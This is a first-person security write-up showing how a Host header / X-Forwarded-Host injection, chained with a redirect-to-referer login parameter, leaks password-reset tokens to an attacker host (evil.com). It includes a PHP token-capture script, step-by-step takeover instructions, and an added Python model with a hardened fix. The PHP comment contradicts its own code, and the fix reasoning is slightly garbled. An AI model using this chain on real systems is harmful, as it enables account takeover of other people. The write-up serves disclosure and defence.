Love Story Of An Account Takeover (Chaining Host Header Injection To Take Over Someone's Account)

First Write-up.
So recently I discovered a Host Header Injection [Ex: radiact.com].
Basically, I was testing the “Password Reset” function.
I noticed that we can redirect by changing the Host header or by adding an extra header, “X-Forwarded-Host”. So changing this host to evil.com will redirect you to evil.com. But as we know, reporting a simple Host Header Injection with a redirection is not enough to show real impact.

So I simply kept this aside and looked for more interesting behavior. I requested a reset token and tried to redirect and capture the Referer, but no luck. Looking further, I noticed a parameter called “redirect_to_referer=yes”. I dug into it and understood that if we log in with that parameter, it will redirect us to the Referer.

Well, I visited the reset link I had generated before. Let’s take it as “Ex: radiact.com/reset?token=abc”. Then I went back to the login panel, signed in with my credentials and captured that request. After that I added “X-Forwarded-Host: evil.com” and Bingo!!! Finally it redirected to “evil.com/reset?token=abc”.


Now I created a PHP script hosted at “evil.com/reset/index.php”.
Ex:
<?php
// Take the token that arrived in the redirected request (evil.com/reset?token=abc)
// and append it to a local file so it can be read back later.
$x = $_GET['token'];
$file = fopen("token.txt", "w");
echo fwrite($file, $x);
fclose($file);
?>
Now we came up with another trick to execute the attack more simply and more anonymously. We used a Firefox extension to add a custom header only for “radiact.com/login”, so we added “X-Forwarded-Host: evil.com” there. Then finally we can execute the attack. Let’s start from the beginning.

01. We generated a reset token.
02. Then we visited that reset page.
03. Then we clicked on Sign In.
04. Then we entered our credentials and hit submit.
05. Bingo! We got redirected to evil.com/reset?token=abc

NOTE: No need to intercept the request, because we added the custom header via the Firefox extension, so it is sent automatically.

06. Visit evil.com/token.txt
07. Welcome, now you can pwn the account by resetting the password.
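
The behaviour described in the steps above, modelled in code next to a hardened version, as an added example that is not part of the original write-up and not the site's real code. It assumes (as the write-up implies) that the application takes the path and query from the Referer and rebuilds an absolute URL using the host the request claims, preferring X-Forwarded-Host over Host; the hostnames radiact.com and evil.com are the write-up's placeholders, CANONICAL_HOST and ALLOWED_REDIRECT_HOSTS are hypothetical configuration values, and header names are assumed to arrive in canonical case (as most frameworks normalise them).

```python
from urllib.parse import urlsplit, urlunsplit

# Hypothetical configuration values, constructed for this example.
CANONICAL_HOST = "radiact.com"              # the host the application is really served on
ALLOWED_REDIRECT_HOSTS = {CANONICAL_HOST}   # hosts a post-login redirect may point at


def _parse_referer(headers):
    """Return the split Referer URL, or None when the header is absent."""
    referer = headers.get("Referer")
    return urlsplit(referer) if referer else None


def vulnerable_post_login_redirect(headers, form):
    """Assumed model of the flaw: with redirect_to_referer=yes the app reuses the
    Referer's path and query but takes the host from the request itself, preferring
    X-Forwarded-Host over Host. Whoever controls that header controls where the
    browser (and the reset token in the query string) is sent."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host") or CANONICAL_HOST
    ref = _parse_referer(headers)
    if form.get("redirect_to_referer") == "yes" and ref is not None:
        return urlunsplit(("https", host, ref.path or "/", ref.query, ""))
    return urlunsplit(("https", host, "/", "", ""))


def safe_post_login_redirect(headers, form):
    """Hardened version: the host never comes from the request. The canonical host is
    configuration, the Referer is honoured only when its scheme is https and its
    hostname is on the allowlist, and only its path and query are reused (userinfo,
    port and fragment are discarded). Anything else falls back to the site root."""
    ref = _parse_referer(headers)
    if form.get("redirect_to_referer") == "yes" and ref is not None:
        # ref.hostname is the part after the last '@', so "user@radiact.com@evil.com"
        # resolves to evil.com and is rejected; a relative Referer gives None.
        if ref.scheme == "https" and ref.hostname in ALLOWED_REDIRECT_HOSTS:
            return urlunsplit(("https", CANONICAL_HOST, ref.path or "/", ref.query, ""))
    return urlunsplit(("https", CANONICAL_HOST, "/", "", ""))


if __name__ == "__main__":
    # Constructed request: the login POST from step 04, with the injected header.
    login_headers = {
        "Host": "radiact.com",
        "X-Forwarded-Host": "evil.com",
        "Referer": "https://radiact.com/reset?token=abc",
    }
    login_form = {"redirect_to_referer": "yes"}
    print("vulnerable:", vulnerable_post_login_redirect(login_headers, login_form))
    print("hardened:  ", safe_post_login_redirect(login_headers, login_form))
```

The fix has two parts that both matter: the edge proxy should overwrite or drop any client-supplied X-Forwarded-Host rather than pass it through, and the application should never derive its own origin from request headers when building redirect or reset URLs. Checking only the redirect target host (without the fixed canonical host) is not enough, because the allowlist comparison must be done on the parsed hostname, not on a prefix or substring of the URL.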

Hope you understood what I tried to explain. Sorry for my bad English.
Thanks for reading this.
Take care.